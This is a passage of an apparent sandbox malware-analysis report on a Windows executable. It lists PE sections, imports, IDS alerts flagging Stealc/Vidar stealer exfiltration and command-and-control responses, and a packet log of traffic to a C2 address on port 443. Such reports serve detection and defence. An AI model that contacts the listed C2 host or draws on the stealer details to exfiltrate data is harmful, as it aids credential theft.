IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x72b9c | 0x2000 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x100000 | 0x52ba | 0x5400 | b1edbe4e3b88b6484c11dd4114f0c003 | False | 0.7529761904761905 | data | 6.741237811431139 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x106000 | 0xfd6 | 0x1000 | ddad614c9dbc96c582c7870421c4d911 | False | 0.59765625 | data | 5.593601234467291 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1001c0 | 0x2519 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.001158260503317
RT_ICON | 0x1026dc | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.5324450772986168
RT_DIALOG | 0x104d44 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x104e44 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x104f60 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x104fc0 | 0x22 | data | English | United States | 0.9705882352941176
RT_MANIFEST | 0x104fe4 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T06:21:24.647125+0100 | 2859378 | ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 | 1 | 192.168.2.4 | 49743 | 94.130.188.57 | 443 | TCP
2024-12-23T06:21:29.220536+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 | 1 | 192.168.2.4 | 49745 | 94.130.188.57 | 443 | TCP
2024-12-23T06:21:29.220597+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 94.130.188.57 | 443 | 192.168.2.4 | 49745 | TCP
2024-12-23T06:21:31.758950+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 94.130.188.57 | 443 | 192.168.2.4 | 49746 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.931901932 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.931952953 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.932023048 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.932224035 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:26.932235956 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:28.332036972 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:28.332230091 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:28.332931995 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:28.332945108 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:28.338105917 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:28.338114023 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.220355034 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.220397949 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.220429897 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.220452070 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.220464945 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.220488071 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.220509052 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.220544100 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.262713909 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.262758017 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.464332104 CET49746443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.464432955 CET4434974694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.464533091 CET49746443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.474189043 CET49746443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:29.474241972 CET4434974694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:30.871912956 CET4434974694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:30.871989965 CET49746443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:30.872456074 CET49746443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:30.872498035 CET4434974694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:30.874316931 CET49746443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:30.874330044 CET4434974694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.758734941 CET4434974694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.758822918 CET4434974694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.758883953 CET49746443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.759028912 CET49746443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.759073973 CET49746443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.759114981 CET4434974694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.779114008 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.779164076 CET4434974794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.779252052 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.779496908 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:31.779509068 CET4434974794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:32.767985106 CET49748443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:32.768080950 CET4434974894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:32.768168926 CET49748443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:32.768615961 CET49748443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:32.768651962 CET4434974894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:33.178862095 CET4434974794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:33.178942919 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:33.179441929 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:33.179452896 CET4434974794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:33.181710958 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:33.181720972 CET4434974794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:33.181773901 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:33.181788921 CET4434974794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.170576096 CET4434974894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.170742989 CET49748443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.171660900 CET49748443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.171678066 CET4434974894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.173995972 CET49748443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.174005985 CET4434974894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.183725119 CET4434974794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.183799982 CET4434974794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.184073925 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.184073925 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.184647083 CET49747443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:34.184669971 CET4434974794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.149029970 CET4434974894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.149096966 CET49748443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.149100065 CET4434974894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.149147987 CET49748443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.149933100 CET49748443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.149971962 CET4434974894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.927664042 CET49754443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.927771091 CET44349754142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.927956104 CET49754443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.928252935 CET49754443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.928292990 CET44349754142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:36.482877016 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:36.482923985 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:36.483112097 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.306607962 CET44349756142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.311156034 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.311198950 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.311206102 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.340495110 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.340543032 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.340555906 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.351783991 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.351830006 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.351839066 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.365169048 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.366996050 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.367007971 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.413146973 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.413156033 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.433154106 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.433834076 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.433841944 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.445344925 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.445425987 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.445507050 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.445524931 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.445561886 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.462568045 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.467329979 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.467348099 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.467386961 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.467392921 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.467427969 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.480931997 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.493586063 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.493648052 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.493695974 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.493705988 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.493746042 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.505184889 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.516343117 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.516367912 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.518743992 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.518755913 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.518800020 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.527242899 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.527384043 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.527928114 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.527935028 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.537597895 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.537636995 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.537643909 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.547463894 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.547631979 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.547641039 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.554693937 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.554754972 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.554763079 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.561939955 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.561979055 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.561985970 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.568996906 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.569555998 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.569564104 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.576293945 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.576337099 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.576349020 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.583515882 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.584093094 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.584100962 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.590734959 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.590792894 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.590800047 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.600687981 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.600733042 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.600739956 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.605174065 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.605218887 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.605223894 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.612373114 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.612416983 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.612423897 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.620791912 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.621043921 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.621051073 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.635921955 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770922899 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770936966 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770994902 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.771007061 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.771014929 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.771018982 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.785990000 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.786077023 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.786521912 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.786564112 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788058996 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788085938 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788153887 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788178921 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788191080 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788211107 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788288116 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788322926 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788337946 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788351059 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788403034 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788422108 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:45.736260891 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:45.736356020 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:45.736367941 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:45.736711025 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:45.737253904 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:45.737276077 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.244767904 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.244874001 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.245018005 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.245018959 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.245750904 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.245796919 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.533323050 CET49770443192.168.2.494.130.188.57
